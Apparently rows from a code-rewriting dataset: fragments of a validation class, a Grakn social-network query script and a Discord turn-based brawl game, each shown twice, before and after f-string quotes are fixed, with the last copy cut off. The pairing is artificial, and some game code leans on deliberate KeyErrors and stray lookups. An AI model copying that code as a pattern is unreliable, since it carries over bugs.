self.actions_replay_failed
or self.reward_validation_failed
or self.benchmark_semantics_validation_failed
)
def __repr__(self):
# Remove default-scheme prefix to improve output readability.
benchmark = re.sub(r"^benchmark://", "", str(self.state.benchmark))
if not self.okay():
msg = ", ".join(self.error_details.strip().split("\n"))
return f"❌ {benchmark} {truncate(msg, max_lines=1, max_line_len=50)}"
elif self.state.reward is None:
return f"✅ {benchmark}"
else:
return f"✅ {benchmark} {self.state.reward:.4f}"
def __str__(self):
return repr(self)
@classmethod
def join(cls, results: Iterable["ValidationResult"]):
"""Create a validation result that is the union join of multiple results."""
results = list(results)
if not results:
raise ValueError("No states to join")
if any(r.state != results[0].state for r in results[1:]):
raise ValueError("All states must be the same")
return cls(
# NOTE: No checking that states are the same.
state=results[0].state,
walltime=sum(r.walltime for r in results),
reward_validated=any(r.reward_validated for r in results),
actions_replay_failed=any(r.actions_replay_failed for r in results),
reward_validation_failed=any(r.reward_validation_failed for r in results),
benchmark_semantics_validated=any(
r.benchmark_semantics_validated for r in results
),
benchmark_semantics_validation_failed=any(
r.benchmark_semantics_validation_failed for r in results
),
errors=list(itertools.chain.from_iterable(r.errors for r in results)),
)
|
"""
Run custom Graql queries on Grakn graph to answer questions based on business case.
"""
from grakn.client import GraknClient
keyspace_name = "social_network"
def run_queries():
# Builds a Grakn graph within the specified keyspace
with GraknClient(uri="localhost:48555") as client:
with client.session(keyspace=keyspace_name) as session:
with session.transaction().write() as transaction:
# Run required queries for inference
_ = query1(transaction)
_ = query2(transaction)
_ = query3(transaction, region='East Asia')
_ = query3(transaction, region='Latin America')
_ = query4(transaction, age_lower=29, age_upper=46)
def query1(transaction):
"""
Who are the top 3 most-followed persons in the network?
"""
query = f'''
match $person isa person;
(follower: $follower, followee: $person) isa connection;
get; group $person; count;
'''
print(f"\nQuery 1:\n {query}")
iterator = transaction.query(query)
# To obtain the result for the "count" query, we need to look up the grakn python-client
# source code: https://github.com/graknlabs/client-python/tree/master/grakn/service/Session
# The object hierarchy needs to be looked up from the source code
result = []
for item in list(iterator): # Consume ResponseIterator into a list
# Convert AnswerGroup object --> Value and apply the number() method of this instance
counts = item.answers()[0].number()
# Apply the owner() method of AnswerGroup object to identify parent concepts
# This returns an Attribute instance, on which we apply the value() method
person = next(item.owner().attributes()).value()
result.append({'personID': person, 'numFollowers': counts})
sorted_results = sorted(result, key=lambda x: x['numFollowers'], reverse=True)
print(f"Top 3 most-followed persons:\n{sorted_results[:3]}")
return sorted_results
def query2(transaction):
"""
In which city does the most-followed person in the network live?
NOTE: This query is divided into two parts - we first identify the most-followed person
(using the same query as query1) - and then use the ID of the person to match the city
in which this person lives.
"""
# Part 2a: Obtain ID of most-followed (same as query1)
top_3_followed = query1(transaction)
top_1_followed = top_3_followed[0]['personID']
print(f"Top most-followed person ID:\n{top_1_followed}")
# Part 2b: Use ID of most-followed person and find their city of residence
city_query = f'''
match $person isa person, has person-id {top_1_followed};
$residence(contains-residence: $city, in-city: $person) isa has-residence;
get;
'''
print(f"\nQuery 2 (Obtain city in which most-followed person lives):\n {city_query}")
iterator = transaction.query(city_query)
answer = [ans.get('city') for ans in iterator][0]
result = next(answer.attributes()).value()
print(f"City in which most-followed person lives:\n{result}")
return result
def query3(transaction, **params):
"""
Which are the top 5 cities in a particular region of the world with the lowest average age in the network?
"""
query = f'''
match $person isa person, has age $age;
$region isa region, has name "{params['region']}";
$city isa city, has name $city-name;
(contains-country: $region, in-region: $country) isa has-country;
(contains-city: $country, in-country: $city) isa has-city;
(contains-residence: $city, in-city: $person) isa has-residence;
get $age, $city-name; group $city-name; mean $age;
'''
print(f"\nQuery 3:\n {query}")
iterator = transaction.query(query)
result = []
for item in list(iterator):
mean_age = item.answers()[0].number() # Retrieve the number contained in this Value instance
city = item.owner().value() # Retrieve the value contained in this Attribute instance
result.append({'city': city, 'averageAge': mean_age})
sorted_results = sorted(result, key=lambda x: x['averageAge'])
print(f"5 countries with lowest average age in {params["region"]}:\n{sorted_results[:5]}")
return sorted_results
def query4(transaction, **params):
"""
Which 3 countries in the network have the most people within a specified age range?
"""
query = f'''
match $person isa person,
has age > {params['age_lower']}, has age < {params['age_upper']};
$country isa country, has name $country-name;
(contains-city: $country, in-country: $city) isa has-city;
(contains-residence: $city, in-city: $person) isa has-residence;
get; group $country-name; count;
'''
print(f"\nQuery 4:\n {query}")
iterator = transaction.query(query)
result = []
for item in list(iterator): # Consume ResponseIterator into a list
counts = item.answers()[0].number()
country = item.owner().value()
result.append({'country': country, 'personCounts': counts})
sorted_results = sorted(result, key=lambda x: x['personCounts'], reverse=True)
print(f"3 Countries with the most people with age > {params['age_lower']} and < {params['age_upper']}: \
\n{sorted_results[:3]}")
return sorted_results
if __name__ == "__main__":
run_queries() | """
Run custom Graql queries on Grakn graph to answer questions based on business case.
"""
from grakn.client import GraknClient
keyspace_name = "social_network"
def run_queries():
# Builds a Grakn graph within the specified keyspace
with GraknClient(uri="localhost:48555") as client:
with client.session(keyspace=keyspace_name) as session:
with session.transaction().write() as transaction:
# Run required queries for inference
_ = query1(transaction)
_ = query2(transaction)
_ = query3(transaction, region='East Asia')
_ = query3(transaction, region='Latin America')
_ = query4(transaction, age_lower=29, age_upper=46)
def query1(transaction):
"""
Who are the top 3 most-followed persons in the network?
"""
query = f'''
match $person isa person;
(follower: $follower, followee: $person) isa connection;
get; group $person; count;
'''
print(f"\nQuery 1:\n {query}")
iterator = transaction.query(query)
# To obtain the result for the "count" query, we need to look up the grakn python-client
# source code: https://github.com/graknlabs/client-python/tree/master/grakn/service/Session
# The object hierarchy needs to be looked up from the source code
result = []
for item in list(iterator): # Consume ResponseIterator into a list
# Convert AnswerGroup object --> Value and apply the number() method of this instance
counts = item.answers()[0].number()
# Apply the owner() method of AnswerGroup object to identify parent concepts
# This returns an Attribute instance, on which we apply the value() method
person = next(item.owner().attributes()).value()
result.append({'personID': person, 'numFollowers': counts})
sorted_results = sorted(result, key=lambda x: x['numFollowers'], reverse=True)
print(f"Top 3 most-followed persons:\n{sorted_results[:3]}")
return sorted_results
def query2(transaction):
"""
In which city does the most-followed person in the network live?
NOTE: This query is divided into two parts - we first identify the most-followed person
(using the same query as query1) - and then use the ID of the person to match the city
in which this person lives.
"""
# Part 2a: Obtain ID of most-followed (same as query1)
top_3_followed = query1(transaction)
top_1_followed = top_3_followed[0]['personID']
print(f"Top most-followed person ID:\n{top_1_followed}")
# Part 2b: Use ID of most-followed person and find their city of residence
city_query = f'''
match $person isa person, has person-id {top_1_followed};
$residence(contains-residence: $city, in-city: $person) isa has-residence;
get;
'''
print(f"\nQuery 2 (Obtain city in which most-followed person lives):\n {city_query}")
iterator = transaction.query(city_query)
answer = [ans.get('city') for ans in iterator][0]
result = next(answer.attributes()).value()
print(f"City in which most-followed person lives:\n{result}")
return result
def query3(transaction, **params):
"""
Which are the top 5 cities in a particular region of the world with the lowest average age in the network?
"""
query = f'''
match $person isa person, has age $age;
$region isa region, has name "{params['region']}";
$city isa city, has name $city-name;
(contains-country: $region, in-region: $country) isa has-country;
(contains-city: $country, in-country: $city) isa has-city;
(contains-residence: $city, in-city: $person) isa has-residence;
get $age, $city-name; group $city-name; mean $age;
'''
print(f"\nQuery 3:\n {query}")
iterator = transaction.query(query)
result = []
for item in list(iterator):
mean_age = item.answers()[0].number() # Retrieve the number contained in this Value instance
city = item.owner().value() # Retrieve the value contained in this Attribute instance
result.append({'city': city, 'averageAge': mean_age})
sorted_results = sorted(result, key=lambda x: x['averageAge'])
print(f"5 countries with lowest average age in {params['region']}:\n{sorted_results[:5]}")
return sorted_results
def query4(transaction, **params):
"""
Which 3 countries in the network have the most people within a specified age range?
"""
query = f'''
match $person isa person,
has age > {params['age_lower']}, has age < {params['age_upper']};
$country isa country, has name $country-name;
(contains-city: $country, in-country: $city) isa has-city;
(contains-residence: $city, in-city: $person) isa has-residence;
get; group $country-name; count;
'''
print(f"\nQuery 4:\n {query}")
iterator = transaction.query(query)
result = []
for item in list(iterator): # Consume ResponseIterator into a list
counts = item.answers()[0].number()
country = item.owner().value()
result.append({'country': country, 'personCounts': counts})
sorted_results = sorted(result, key=lambda x: x['personCounts'], reverse=True)
print(f"3 Countries with the most people with age > {params['age_lower']} and < {params['age_upper']}: \
\n{sorted_results[:3]}")
return sorted_results
if __name__ == "__main__":
run_queries() |
import discord
from discord.ext import commands
from dislash import ActionRow, Button, ButtonStyle, SelectMenu, SelectOption
import asyncio
import random
import json
from datetime import datetime
import os
with open('./ext/brawl.json', 'r') as f:
data = json.load(f)
class Brawl(commands.Cog):
def __init__(self, client):
self.client = client
self.battle_hp = dict()
self.ext_turns = dict()
self.options = dict()
self.placebo = dict()
self.cooldowns = dict()
self.info_sesh = dict()
# ext = extra
# exc = exception
# atk = attack
# dmg = damage
# amt = amount
async def write_action(self, id, action):
with open(f'./storage/brawl{id}.txt', 'a') as f:
f.write(f"{datetime.utcnow()}: {action}\n\n")
async def endgame(self, ctx, user=None):
await ctx.send("Game Log:", file=discord.File(f'./storage/brawl{ctx.author.id}.txt'))
os.remove(f'./storage/brawl{ctx.author.id}.txt')
if user:
del self.battle_hp[ctx.author.id]
del self.battle_hp[user.id]
try:
del self.placebo[ctx.author.id]
except:
pass
try:
del self.placebo[user.id]
except:
pass
@commands.group(invoke_without_command=True)
async def brawl(self, ctx):
embed=discord.Embed(title="TCR ***BRAWL*** Version 1.0.0", description="TCR Brawl is a turn-based fighting game written in Python and playable via a Discord bot. It includes all of your"
" favorite TCR members and former TCR members.", color=discord.Color.random())
embed.add_field(name="How to Play:", value="Grab a friend and take a bot channel. Use the `brawl battle` command to get started! The `battle` command has two aliases,"
" `fight` and `start`. You will be prompted to pick a character, then the game will begin! If you want info on a character before playing, use `brawl info`.", inline=False)
embed.add_field(name="All Commands:", value="`brawl`, `info`, `help`, `faq`.", inline=False)
embed.add_field(name="Our FAQ", value="You may want to suggest a character, or you don't want your own person in the game. Check the FAQ to see how to deal with stuff.", inline=False)
embed.set_thumbnail(url="https://images-ext-2.discordapp.net/external/SydGsxAv1JDLCgm4qALPhcke7fv6TWoyVR2lQhEu-NI/%3Fsize%3D128/https/cdn.discordapp.com/icons/681882711945641997/a_2c2eeae970672cefecdb5b8536f42a47.gif")
embed.set_image(url="https://media.discordapp.net/attachments/773319739581136916/864310160520249384/tcabrawl.png?width=1025&height=404")
embed.set_footer(text="TCR Brawl created by UnsoughtConch.")
faq = discord.Embed(title="Frequently Asked Questions", description="These aren't really frequently asked.", color=discord.Color.random())
faq.add_field(name="Why am I not a character here?", value="This has a few answers. You either aren't very familiar, we haven't got to you yet, or we can't think of a good moveset for you.")
faq.add_field(name="I'm in this game and don't want to be. How can I remove myself?", value="If you don't want to be in our game, please contact UnsoughtConch#9225.")
faq.add_field(name="I want to make improvements to the game/a character. Can I?", value="Of course! Make a pull request from [the Coding Bot repository](https://github.com/The-Coding-Academy/Coding-Bot-v4) and edit the JSON or code!")
faq.add_field(name="How can I suggest a character?", value="Contact UnsoughtConch#9225.")
chars = discord.Embed(title="TCR ***BRAWL*** Characters")
for character in data:
char = data[character]
desc = f"Class: {char["class"]}\nAttack One: {char["atk_1"]["name"]}\nAttack Two: {char["atk_2"]["name"]}\nAbility: {char["ability"]["name"]}"
chars.add_field(name=character, value=desc)
chars.set_footer(text="You can get a more interactive and overall better info screen with ;info.")
main_comps = ActionRow(
Button(style=ButtonStyle.green, label="Information", emoji="❕", disabled=True),
Button(style=ButtonStyle.blurple, label="FAQ", emoji="❔"),
Button(style=ButtonStyle.secondary, label="Characters", emoji="🧑")
)
faq_comps = ActionRow(
Button(style=ButtonStyle.green, label="Information", emoji="❕"),
Button(style=ButtonStyle.blurple, label="FAQ", emoji="❔", disabled=True),
Button(style=ButtonStyle.secondary, label="Characters", emoji="🧑")
)
chars_comps = ActionRow(
Button(style=ButtonStyle.green, label="Information", emoji="❕"),
Button(style=ButtonStyle.blurple, label="FAQ", emoji="❔"),
Button(style=ButtonStyle.secondary, label="Characters", emoji="🧑", disabled=True)
)
msg = await ctx.send(embed=embed, components=[main_comps])
on_click = msg.create_click_listener(timeout=60)
@on_click.not_from_user(ctx.author)
async def help_not_from_user(inter):
await inter.reply("You have to be the command invoker to press these buttons.", ephemeral=True)
@on_click.from_user(ctx.author)
async def help_from_user(inter):
await inter.reply(type=6)
if str(inter.clicked_button.emoji) == "❔":
await inter.message.edit(embed=faq, components = [faq_comps])
elif str(inter.clicked_button.emoji) == "❕":
await inter.message.edit(embed=embed, components = [main_comps])
elif str(inter.clicked_button.emoji) == "🧑":
await inter.message.edit(embed=chars, components=[chars_comps])
@on_click.timeout
async def help_timeout():
buttons = ActionRow(
Button(style=ButtonStyle.green, label="Information", emoji="❕", disabled=True),
Button(style=ButtonStyle.blurple, label="FAQ", emoji="❔", disabled=True),
Button(style=ButtonStyle.secondary, label="Characters", emoji="🧑", disabled=True),
)
await msg.edit(components=[buttons])
@brawl.command()
async def faq(self, ctx):
faq = discord.Embed(title="Frequently Asked Questions", description="These aren't really frequently asked.", color=discord.Color.random())
faq.add_field(name="Why am I not a character here?", value="This has a few answers. You either aren't very familiar, we haven't got to you yet, or we can't think of a good moveset for you.")
faq.add_field(name="I'm in this game and don't want to be. How can I remove myself?", value="If you don't want to be in our game, please contact UnsoughtConch#9225.")
faq.add_field(name="How can I suggest a character?", value="Contact UnsoughtConch#9225.")
faq.add_field(name="I want to make improvements to the game/a character. Can I?", value="Of course! Make a pull request from [the Coding Bot repository](https://github.com/The-Coding-Academy/Coding-Bot-v4) and edit the JSON or code!")
faq.add_field(name="I'm a character in this game and want to suggest changes to myself. Can I do that?", value="Of course you can! Contact UnsoughtConch#9225.")
await ctx.send(embed=faq)
@brawl.command()
async def info(self, ctx):
menu_opts = []
char_embds = dict()
chars = discord.Embed(title="TCR ***BRAWL*** Characters", description="Select a character from the select menu to get started!")
for character in data:
menu_opts.append(SelectOption(character, character))
embed = discord.Embed(title="TCR ***BRAWL*** | " + character, color=discord.Color.random(), description=f"Character Class: {data[character]["class"]}")
embed.add_field(name="Attack One:", value=f"NAME: {data[character]["atk_1"]["name"]}\nDAMAGE: {data[character]["atk_1"]["dmg"]}")
embed.add_field(name="Attack Two:", value=f"NAME: {data[character]["atk_2"]["name"]}\nDAMAGE: {data[character]["atk_2"]["dmg"]}")
type = data[character]['ability']['type']
if type == "heal":
embed.add_field(name="Ability:", value=f"NAME: {data[character]["ability"]["name"]}\nTYPE: Healing\nPARTIES HEALED: {data[character]["ability"]["health_gain_amt"]}"
f"\nHEALTH AMOUNT: {data[character]["ability"]["health"]}")
elif type == "stun":
embed.add_field(name="Ability:", value=f"NAME: {data[character]["ability"]["name"]}\nTYPE: Stun\nEXTRA TURNS: {data[character]["ability"]["ext_turns"]}")
elif type == "options":
embed.add_field(name="Ability:", value=f"NAME: {data[character]["ability"]["name"]}\nTYPE: Options\nOPTIONS: {", ".join([name for name in data[character]["ability"]["options"]])}")
elif type == "placebo":
embed.add_field(name="Ability:", value=f"NAME: {data[character]["ability"]["name"]}\nTYPE: Placebo\nEXTRA HEALTH: {data[character]["ability"]["temp_xp"]}\nTURNS KEPT: {data[character]["ability"]["turns"]}")
stri = '\n'
exc_list = []
if 'dmg_exc' in data[character]['atk_1']:
if 'name' in data[character]['atk_1']['dmg_exc']:
exc_list.append(f"CHARACTER: {data[character]["atk_1"]["dmg_exc"]["name"]} | EXTRA DAMAGE: {data[character]["atk_1"]["dmg_exc"]["ext_dmg"]}")
elif "class" in data[character]['atk_1']['dmg_exc']:
exc_list.append(f"CLASS: {data[character]["atk_1"]["dmg_exc"]["class"]} | EXTRA DAMAGE: {data[character]["atk_1"]["dmg_exc"]["ext_dmg"]}")
if 'dmg_exc' in data[character]['atk_2']:
if 'name' in data[character]['atk_2']['dmg_exc']:
exc_list.append(f"CHARACTER: {data[character]["atk_2"]["dmg_exc"]["name"]} | EXTRA DAMAGE: {data[character]["atk_2"]["dmg_exc"]["ext_dmg"]}")
elif "class" in data[character]['atk_2']['dmg_exc']:
exc_list.append(f"CLASS: {data[character]["atk_2"]["dmg_exc"]["class"]} | EXTRA DAMAGE: {data[character]["atk_2"]["dmg_exc"]["ext_dmg"]}")
if exc_list is not None:
stri = '\n'.join(exc_list)
embed.add_field(name="Damage Exceptions:", value=stri)
else:
embed.add_field(name="Damage Exceptions:", value="No exceptions.")
char_embds[character] = embed
menu = SelectMenu(
placeholder = "Select a character...",
custom_id="infoMenu",
options=menu_opts
)
if ctx.author.id in self.info_sesh:
msg = self.info_sesh[ctx.author.id]
pass
else:
msg = await ctx.send(embed=chars, components=[menu])
self.info_sesh[ctx.author.id] = msg
def check(m):
return m.author == ctx.author
try:
inter = await msg.wait_for_dropdown(check=check, timeout=30)
except:
del self.info_sesh[ctx.author.id]
return await msg.edit(components=[])
await inter.reply(type=6)
await msg.edit(embed=char_embds[[option.label for option in inter.select_menu.selected_options][0]])
await self.info(ctx)
@brawl.command(aliases=['fight', 'start'])
async def battle(self, ctx, user:discord.Member):
if user == ctx.author:
return await ctx.send(embed=discord.Embed(title="You cannot battle yourself.", color=discord.Color.red()))
embed = discord.Embed(title=f"Waiting for {user.display_name} to accept...", color=discord.Color.random())
buttons = ActionRow(
Button(style=ButtonStyle.green, label="Accept", emoji="✅"),
Button(style=ButtonStyle.red, label="Deny", emoji="❌")
)
base = await ctx.send(embed=embed, components=[buttons])
def check(m):
return m.author == user
try:
inter = await base.wait_for_button_click(check=check, timeout=30)
except:
await base.edit(embed=f"{user.display_name} failed to respond in time!", color=discord.Color.red())
await self.endgame(ctx)
await inter.reply(type=6)
embed = discord.Embed(title=f"{ctx.author.display_name}, choose your user!", color=discord.Color.random())
char_menu_opts = []
for character in data:
char = data[character]
desc = f"Class: {char["class"]}\nAttack One: {char["atk_1"]["name"]}\nAttack Two: {char["atk_2"]["name"]}\nAbility: {char["ability"]["name"]}"
embed.add_field(name=character, value=desc)
char_menu_opts.append(SelectOption(character, character))
char_menu = SelectMenu(placeholder="Choose your user!", options=char_menu_opts)
await base.delete()
base = await ctx.send(embed=embed, components=[char_menu])
def check(m):
return m.author == ctx.author
try:
inter = await base.wait_for_dropdown(check=check, timeout=120)
except:
await base.edit(embed=discord.Embed(f"{ctx.author.display_name} failed to respond in time!", color=discord.Color.red()))
await self.endgame(ctx)
await inter.reply(type=6)
author_character = [option.label for option in inter.select_menu.selected_options][0]
embed.title = f"{user.display_name}, choose your user!"
await base.edit(embed=embed)
def check(m):
return m.author == user
try:
inter = await base.wait_for_dropdown(check=check, timeout=120)
except:
await ctx.send(embed=discord.Embed(f"{user.display_name} failed to respond in time!", color=discord.Color.red()))
await self.endgame(ctx)
await inter.reply(type=6)
await base.delete()
user_character = [option.label for option in inter.select_menu.selected_options][0]
self.battle_hp[ctx.author.id] = 100
self.battle_hp[user.id] = 100
# True means author turn, False means user turn
turne = True
await self.write_action(ctx.author.id, f"{author_character} ({ctx.author.display_name}) picks a fight with {user_character} ({user.display_name})")
while True:
if self.battle_hp[ctx.author.id] < 1 or self.battle_hp[user.id] < 1:
break
if turne is True:
turn = ctx.author
character = author_character
turn_hp = self.battle_hp[ctx.author.id]
turn_class = data[character]['class']
enemy = user
enemy_character = user_character
enemy_hp = self.battle_hp[user.id]
enemy_class = data[enemy_character]['class']
else:
turn = user
character = user_character
turn_hp = self.battle_hp[user.id]
turn_class = data[character]['class']
enemy = ctx.author
enemy_character = author_character
enemy_hp = self.battle_hp[user.id]
enemy_class = data[enemy_character]['class']
if turn.id in self.placebo:
if self.placebo[turn.id] == 0:
self.battle_hp[turn.id] = self.battle_hp[turn.id] - data[character]['ability']['temp_xp']
else:
self.placebo[turn.id] = self.placebo[turn.id] - 1
embed = discord.Embed(title=f"{turn.display_name}'s Turn")
if turn_hp > 75:
embed.color = discord.Color.green()
elif turn_hp > 25:
embed.color = discord.Color.gold()
elif turn_hp <= 25:
embed.color = discord.Color.red()
embed.add_field(name="Character:", value=character)
embed.add_field(name="HP:", value=turn_hp)
embed.add_field(name="** **", value="** **")
embed.add_field(name=data[character]['atk_1']['name'], value="ATTACK: " + data[character]['atk_1']['desc'])
embed.add_field(name=data[character]['atk_2']['name'], value="ATTACK: " + data[character]['atk_2']['desc'])
embed.add_field(name=data[character]['ability']['name'], value="ABILITY: " + data[character]['ability']['desc'])
embed.set_thumbnail(url=data[character]['pfp'])
options=[
SelectOption(data[character]['atk_1']['name'], "atk_1"),
SelectOption(data[character]['atk_2']['name'], "atk_2"),
SelectOption(data[character]['ability']['name'], "ability")
]
if turn.id in self.cooldowns:
flag = False
if 'atk_1' in self.cooldowns[turn.id]['moves']:
del self.cooldowns[turn.id]['moves']['atk_1']
del options[0]
flag = True
if 'ability' in self.cooldowns[turn.id]['moves']:
if turn.id in self.ext_turns:
pass
else:
if self.cooldowns[turn.id]['moves']['ability'] == 1:
del self.cooldowns[turn.id]['moves']['ability']
else:
self.cooldowns[turn.id]['moves']['ability'] = self.cooldowns[turn.id]['moves']['ability'] - 1
if flag is True:
del options[1]
else:
del options[2]
menu = SelectMenu(
placeholder="Select a move...",
options=options
)
msg1 = await ctx.send(embed=embed, components=[menu])
def check(m):
return m.author == turn
try:
inter = await msg1.wait_for_dropdown(check=check, timeout=120)
except:
await ctx.send(embed=discord.Embed(title=f"{turn.display_name} failed to respond on time, making {enemy.display_name} the winner!", color=discord.Color.red()))
await self.endgame(ctx, user)
return
await inter.reply(type=6)
move = [option.value for option in inter.select_menu.selected_options][0]
if move == "ability":
if turn.id in self.cooldowns:
self.cooldowns[turn.id]['moves']['ability'] = 2
else:
self.cooldowns[turn.id] = {'moves': {'ability': 2}}
if data[character][move]['type'] == 'heal':
self.battle_hp[turn.id] = self.battle_hp[turn.id] + data[character][move]['health']
if data[character][move]['health_gain_amt'] == 2:
self.battle_hp[enemy.id] = self.battle_hp[enemy.id] + data[character][move]['health']
phrase = f"{turn.display_name} healths both parties with {data[character][move]["name"]} and gains {data[character][move]["health"]} health!"
else:
phrase = f"{turn.display_name} healths themself with {data[character][move]["name"]} and gains {data[character][move]["health"]} health!"
elif data[character][move]['type'] == 'stun':
self.ext_turns[turn.id] = data[character][move]['ext_turns']
phrase = f"{turn.display_name} stuns {enemy.display_name} with {data[character][move]["name"]} and gains {self.ext_turns[turn.id]} extra turns!"
elif data[character][move]['type'] == 'options':
buttons = ActionRow(
Button(style=ButtonStyle.green, label="Chill", emoji="😃"),
Button(style=ButtonStyle.red, label="Angry", emoji="😡")
)
msg2 = await ctx.send(embed=discord.Embed(title=f"{turn.display_name}, what option would you like to invoke?"), components=[buttons])
def check(m):
return m.author == turn
try:
inter = await msg2.wait_for_button_click(check=check, timeout=60)
except:
await self.endgame(ctx, user)
return await ctx.send(embed=discord.Embed(title=f"{turn.display_name} didn't choose in time, making {enemy.display_name} the winner!", color=discord.Color.red()))
await inter.reply(type=6)
option = inter.clicked_button.label
if data[character][move]['options'][option]['ext_dmg'] == 0:
try:
del self.options[turn.id]
except:
pass
self.options[turn.id] = data[character][move]['options'][option]['ext_dmg']
phrase = f"{turn.display_name} chooses {option} with {data[character][move]["name"]} and gains {data[character][move]["options"][option]["ext_dmg"]} extra power!"
await msg2.delete()
elif data[character][move]['type'] == "placebo":
self.battle_hp[turn.id] = self.battle_hp[turn.id] + data[character][move]['temp_xp']
self.placebo[turn.id] = data[character][move]['turns']
phrase = f"{turn.display_name} invokes a placebo with {data[character][move]["name"]} that gives them {data[character][move]["temp_xp"]} more HP for {data[character][move]["turns"]} turns!"
else:
try:
dmg_class = data[character][move]['dmg_exc']['class']
if dmg_class == enemy_class:
ext_dmg = data[character][move]['dmg_exc']['ext_dmg']
dmg = ext_dmg + data[character][move]['dmg']
else:
dmg = data["wefrefwfwef"]
except KeyError:
try:
dmg_char = data[character][move]['dmg_exc']['name']
if dmg_char == enemy_character:
dmg = data[character][move]['dmg_exc']['ext_dmg'] + data[character][move]['dmg']
except KeyError:
dmg = data[character][move]['dmg']
if move == 'atk_1':
if turn.id in self.cooldowns:
self.cooldowns[turn.id]['moves']['atk_1'] = 0
else:
self.cooldowns[turn.id] = {'moves': {'atk_1': 0}}
if turn.id in self.options:
ext_dmg = self.options[turn.id]
dmg = ext_dmg + dmg
del self.options[turn.id]
phrase = f"{character} deals {dmg} damage to {enemy_character} with {data[character][move]["name"]}"
if turne is True:
self.battle_hp[user.id] = self.battle_hp[user.id] - dmg
else:
self.battle_hp[ctx.author.id] = self.battle_hp[ctx.author.id] - dmg
await msg1.delete()
await self.write_action(ctx.author.id, phrase)
phrsmsg = await ctx.send(phrase)
try:
turns = self.ext_turns[turn.id]
if turns == 0:
del self.ext_turns[turn.id]
e = self.battle_hp[2]
self.ext_turns[turn.id] = self.ext_turns[turn.id] - 1
turne = True if turn == ctx.author else False
except:
turne = True if turn == user else False
await asyncio.sleep(5)
await phrsmsg.delete()
if self.battle_hp[ctx.author.id] < 1:
embed = discord.Embed(title=user_character + ": " + data[user_character]['catchphrase'] if user_character != 'BobDotCom' else random.choice(data[user_character]['catchphrase']),
description=f"{user_character} won!")
embed.set_footer(text=f"Remaining HP: {turn_hp}")
await ctx.send(embed=embed)
await self.endgame(ctx, user)
else:
embed = discord.Embed(title=author_character + ": " + data[author_character]['catchphrase'] if author_character != 'BobDotCom' else random.choice(data[author_character]['catchphrase']),
description=f"{author_character} won!")
embed.set_footer(text=f"Remaining HP: {turn_hp}")
await ctx.send(embed=embed)
await self.write_action(ctx.author.id, f"{ctx.author.display_name} ({author_character}) wins the battle with {turn_hp} HP remaining.")
await self.endgame(ctx, user)
def setup(client):
client.add_cog(Brawl(client))
| import discord
from discord.ext import commands
from dislash import ActionRow, Button, ButtonStyle, SelectMenu, SelectOption
import asyncio
import random
import json
from datetime import datetime
import os
with open('./ext/brawl.json', 'r') as f:
data = json.load(f)
class Brawl(commands.Cog):
def __init__(self, client):
self.client = client
self.battle_hp = dict()
self.ext_turns = dict()
self.options = dict()
self.placebo = dict()
self.cooldowns = dict()
self.info_sesh = dict()
# ext = extra
# exc = exception
# atk = attack
# dmg = damage
# amt = amount
async def write_action(self, id, action):
with open(f'./storage/brawl{id}.txt', 'a') as f:
f.write(f"{datetime.utcnow()}: {action}\n\n")
async def endgame(self, ctx, user=None):
await ctx.send("Game Log:", file=discord.File(f'./storage/brawl{ctx.author.id}.txt'))
os.remove(f'./storage/brawl{ctx.author.id}.txt')
if user:
del self.battle_hp[ctx.author.id]
del self.battle_hp[user.id]
try:
del self.placebo[ctx.author.id]
except:
pass
try:
del self.placebo[user.id]
except:
pass
@commands.group(invoke_without_command=True)
async def brawl(self, ctx):
embed=discord.Embed(title="TCR ***BRAWL*** Version 1.0.0", description="TCR Brawl is a turn-based fighting game written in Python and playable via a Discord bot. It includes all of your"
" favorite TCR members and former TCR members.", color=discord.Color.random())
embed.add_field(name="How to Play:", value="Grab a friend and take a bot channel. Use the `brawl battle` command to get started! The `battle` command has two aliases,"
" `fight` and `start`. You will be prompted to pick a character, then the game will begin! If you want info on a character before playing, use `brawl info`.", inline=False)
embed.add_field(name="All Commands:", value="`brawl`, `info`, `help`, `faq`.", inline=False)
embed.add_field(name="Our FAQ", value="You may want to suggest a character, or you don't want your own person in the game. Check the FAQ to see how to deal with stuff.", inline=False)
embed.set_thumbnail(url="https://images-ext-2.discordapp.net/external/SydGsxAv1JDLCgm4qALPhcke7fv6TWoyVR2lQhEu-NI/%3Fsize%3D128/https/cdn.discordapp.com/icons/681882711945641997/a_2c2eeae970672cefecdb5b8536f42a47.gif")
embed.set_image(url="https://media.discordapp.net/attachments/773319739581136916/864310160520249384/tcabrawl.png?width=1025&height=404")
embed.set_footer(text="TCR Brawl created by UnsoughtConch.")
faq = discord.Embed(title="Frequently Asked Questions", description="These aren't really frequently asked.", color=discord.Color.random())
faq.add_field(name="Why am I not a character here?", value="This has a few answers. You either aren't very familiar, we haven't got to you yet, or we can't think of a good moveset for you.")
faq.add_field(name="I'm in this game and don't want to be. How can I remove myself?", value="If you don't want to be in our game, please contact UnsoughtConch#9225.")
faq.add_field(name="I want to make improvements to the game/a character. Can I?", value="Of course! Make a pull request from [the Coding Bot repository](https://github.com/The-Coding-Academy/Coding-Bot-v4) and edit the JSON or code!")
faq.add_field(name="How can I suggest a character?", value="Contact UnsoughtConch#9225.")
chars = discord.Embed(title="TCR ***BRAWL*** Characters")
for character in data:
char = data[character]
desc = f"Class: {char['class']}\nAttack One: {char['atk_1']['name']}\nAttack Two: {char['atk_2']['name']}\nAbility: {char['ability']['name']}"
chars.add_field(name=character, value=desc)
chars.set_footer(text="You can get a more interactive and overall better info screen with ;info.")
main_comps = ActionRow(
Button(style=ButtonStyle.green, label="Information", emoji="❕", disabled=True),
Button(style=ButtonStyle.blurple, label="FAQ", emoji="❔"),
Button(style=ButtonStyle.secondary, label="Characters", emoji="🧑")
)
faq_comps = ActionRow(
Button(style=ButtonStyle.green, label="Information", emoji="❕"),
Button(style=ButtonStyle.blurple, label="FAQ", emoji="❔", disabled=True),
Button(style=ButtonStyle.secondary, label="Characters", emoji="🧑")
)
chars_comps = ActionRow(
Button(style=ButtonStyle.green, label="Information", emoji="❕"),
Button(style=ButtonStyle.blurple, label="FAQ", emoji="❔"),
Button(style=ButtonStyle.secondary, label="Characters", emoji="🧑", disabled=True)
)
msg = await ctx.send(embed=embed, components=[main_comps])
on_click = msg.create_click_listener(timeout=60)
@on_click.not_from_user(ctx.author)
async def help_not_from_user(inter):
await inter.reply("You have to be the command invoker to press these buttons.", ephemeral=True)
@on_click.from_user(ctx.author)
async def help_from_user(inter):
await inter.reply(type=6)
if str(inter.clicked_button.emoji) == "❔":
await inter.message.edit(embed=faq, components = [faq_comps])
elif str(inter.clicked_button.emoji) == "❕":
